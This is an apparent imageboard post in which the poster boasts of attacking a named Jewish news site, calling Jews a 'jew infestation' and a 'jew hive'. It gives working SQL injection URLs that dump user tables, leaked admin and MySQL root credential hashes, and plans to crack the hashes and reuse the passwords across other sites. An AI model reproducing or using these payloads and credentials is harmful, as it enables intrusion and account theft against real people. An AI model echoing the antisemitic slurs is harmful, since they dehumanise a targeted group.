|
>>
|
No. 2205
Where can I download this megaphone crap? I want to see if it's exploitable. If so, might be able to pwn the entire megaphone jew infestation.
Also, here is another jew hive vulnerable to SQL injection. I pasted this on helldive.
phpbb_users
http://its.goofyti.me/u/http://www.virtualjerusalem.com/news.php?Itemid=-571+UNION+SELECT+1,group_concat%28username,0x3a,user_password,0x3a,user_email%29,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+phpbb_users--
phpbb3_users
http://its.goofyti.me/u/http://www.virtualjerusalem.com/news.php?Itemid=-571+UNION+SELECT+1,group_concat%28username,0x3a,user_password,0x3a,user_email%29,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+phpbb3_users+limit+0,+99999999999999--
mysql.user
http://its.goofyti.me/u/http://www.virtualjerusalem.com/news.php?Itemid=-571+UNION+SELECT+1,concat_ws%280x3a,user,password,host%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30+from+mysql.user--
jos_users (joomla admin)
http://its.goofyti.me/u/http://www.virtualjerusalem.com/news.php?Itemid=-571+UNION+SELECT+1,group_concat%28username,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24,25,26,27,28,29,30+from+jos_users+--
JOOMLA ADMIN
admin:6223096f587570ca7324f5a3ce154d1b:x0VKphsVqfQ3FT0E5w6bLT3EYT0vUaGM
PHPBB ADMIN
administrator:f256965d68336f131deb7942ad56ad6f
PHPBB3 ADMIN
Eric:$H$9bz9fTEEodcACeRfthgIGqcpM0nKcK1
MYSQL.USER
root:*E6685D00DE269757C05684C9E8CBD9A4703AF340:localhost
There's more tables and shit on there, to view the output of the injection on the pages you have to right click and "view html source" and you'll notice the output between <title> </title>.
For now I'll try and crack the hashes. The phpbb3 forum doesn't have any members apart from the admins etc... The phpbb database is full but im having probs dumping all the data from the users table. Even if we're unable to use the usernames and passwords on that site you can bet that atleast 60% of that DB will use the same pass everywhere.
|